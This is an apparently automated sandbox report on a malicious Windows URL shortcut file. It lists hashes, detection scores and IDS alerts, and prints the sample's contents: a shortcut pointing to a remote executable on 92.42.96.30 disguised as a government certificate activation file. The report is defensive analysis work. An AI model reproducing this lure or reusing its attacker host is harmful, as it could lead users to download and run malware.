Windows Analysis Report
3d#U0430.url

Overview

General Information

Sample name:	3d#U0430.url renamed because original name is a hash value
Original sample name:	.url
Analysis ID:	1561507
MD5:	9aff477d681be77815b141cad037d7b6
SHA1:	1da43753c3b48eb25180b04a2e7c6d64d9159be5
SHA256:	8cf24fe1384ca8ea763081b78fd14995704bbd73a871ebe1c362053767aeec20

Errors No process behavior to analyse as no analysis process or sample was found

Detection

Score:	52
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Found malicious URL file

Suricata IDS alerts with low severity for network traffic

Classification

Signatures

AV Detection

Multi AV Scanner detection for submitted file

Source: 3d#U0430.url

ReversingLabs: Detection: 42%

Suricata IDS alerts with low severity for network traffic

Source: Network traffic

Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50017 -> 20.42.65.84:443

System Summary

Found malicious URL file

Source: 3d#U0430.url

Initial sample: [InternetShortcut]URL=file://92.42.96.30/pdp.nacs.gov.ua/Certificate_Activate_45052389_005553.exeIconIndex=1HotKey=0IDList=IconFile=C:\Windows\System32\SHELL32.dll[{009862A0-0000-0000-C000-000000005986}]Prop3=19,9[{000214A0-0000-0000-C000-000000000046}]Prop3=19,9[InternetShortcut.A][InternetShortcut.W]URL=file://92.42.96.30/Activation/Certificate+AF8hFgBf-45052389+AF8-005553.exe

Source: classification engine

Classification label: mal52.winURL@0/0@0/0

Source: 3d#U0430.url

ReversingLabs: Detection: 42%

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

⊘No contacted IP infos

ID:	1561507
Product:	CloudBasic
Start time:	16:07:46
Start date:	23.11.2024
Sample:	3d#U0430.url
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	9aff477d681be77815b141cad037d7b6
SHA1:	1da43753c3b48eb25180b04a2e7c6d64d9159be5
SHA256:	8cf24fe1384ca8ea763081b78fd14995704bbd73a871ebe1c362053767aeec20
Filetype:	Windows URL shortcut (11001/1) 91.66%

Windows Analysis Report 3d#U0430.url

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Networking

System Summary

Screenshots

Behavior Graph

Network Map

Windows Analysis Report
3d#U0430.url